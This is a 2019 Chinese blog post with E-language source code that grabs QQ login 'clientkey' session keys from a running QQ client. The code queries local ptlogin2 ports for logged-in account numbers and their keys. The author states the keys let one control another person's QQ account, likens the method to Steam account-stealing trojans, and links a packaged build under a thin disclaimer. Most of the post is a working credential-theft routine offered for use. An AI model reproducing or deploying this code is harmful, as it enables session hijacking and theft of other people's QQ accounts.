易语言对QQkey获取的优化

key就是密匙的意思,顾名思义就是QQ密匙,就像是qq的另一种身份证,可以通过key来识别你的QQ
也就是说我们可以利用获取到的key来操作对方的QQ,当年一时泛滥的steam盗号木马原理就是这个
之前key获取的话会弹出一个js错误弹窗,于是乎优化了一下获取的方法,这样就可以~ 好了好了别想太多了
本帖仅供参考,一切违法行为后果自负。

.版本 2

.支持库 EThread

.子程序 fm_key
.局部变量 QQ_Key_Cookie, 文本型, , , 临时Cookie储存
.局部变量 QQ_Key_Port, 整数型, , , 端口号
.局部变量 QQ_Key_Str, 文本型, , , 临时文本
.局部变量 QQ_Key_i, 整数型, , , 临时整数变量
.局部变量 QQ_Key_ii, 整数型, , , 临时整数变量
.局部变量 QQ_Key_regular, 正则表达式类, , , 正则
.局部变量 pt_local_token, 文本型, , , Token参数
.局部变量 QQ_Key_uin, 文本型, , , 本机QQ号码
.局部变量 location, 文本型, , , 返回协议头
.局部变量 clientkey, 文本型, , , 本机号码的KEY
.局部变量 k, 逻辑型

k = 真
qqkey = “”
.如果真 (进程_是否存在 (“QQ.exe”))

网页_访问_对象 (“https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&pt_no_auth=1&s_url=https%3A%2F%2Fqun.qq.com%2F”, , , , QQ_Key_Cookie)
pt_local_token = 文本_取出中间文本 (QQ_Key_Cookie, “pt_local_token=”, “;”, , )
QQ_Key_Port = 4299
.计次循环首 (10, QQ_Key_i)
    QQ_Key_Port = QQ_Key_Port + 1
    QQ_Key_Str = 编码_Utf8到Ansi (网页_访问_对象 (“https://localhost.ptlogin2.qq.com:” + 到文本 (QQ_Key_Port) + “/pt_get_uins?callback=ptui_getuins_CB&r=0.46434646978152294&pt_local_tk=” + pt_local_token, , , QQ_Key_Cookie))

    .如果真 (QQ_Key_Str ≠ “”)
        ' ’信息框 (“当前可用端口:” + 到文本 (QQ_Key_Port), 0, )
        QQ_Key_regular.创建 (“uin” + #引号 + “:” + #引号 + “(.*?)” + #引号 + “,”, QQ_Key_Str)
        .计次循环首 (QQ_Key_regular.取匹配数量 (), QQ_Key_ii)
            QQ_Key_uin = QQ_Key_regular.取子匹配文本 (QQ_Key_ii, 1)
            网页_访问_对象 (“https://localhost.ptlogin2.qq.com:” + 到文本 (QQ_Key_Port) + “/pt_get_st?clientuin=” + QQ_Key_uin + “&callback=ptui_getst_CB&r=0.05343814654772827&pt_local_tk=” + pt_local_token, , , QQ_Key_Cookie, , , location, , 真)
            clientkey = 文本_取出中间文本 (location, “clientkey=”, “;”, , )
            .如果 (文本_取出现次数 (QQ_Key_uin, qqkey, 假) ≥ 1)
                关闭线程句柄 (jb)
            .否则
                qqkey = qqkey + QQ_Key_uin + “|” + clientkey + #换行符
            .如果结束


        .计次循环尾 ()
        跳出循环 ()
    .如果真结束

.计次循环尾 ()
程序_延时 (1, 2)

打包案例:https://www.lanzous.com/i337yre

Last modification:February 7th, 2019 at 07:16 pm
If you think my article is useful to you, please feel free to appreciate

Leave a Comment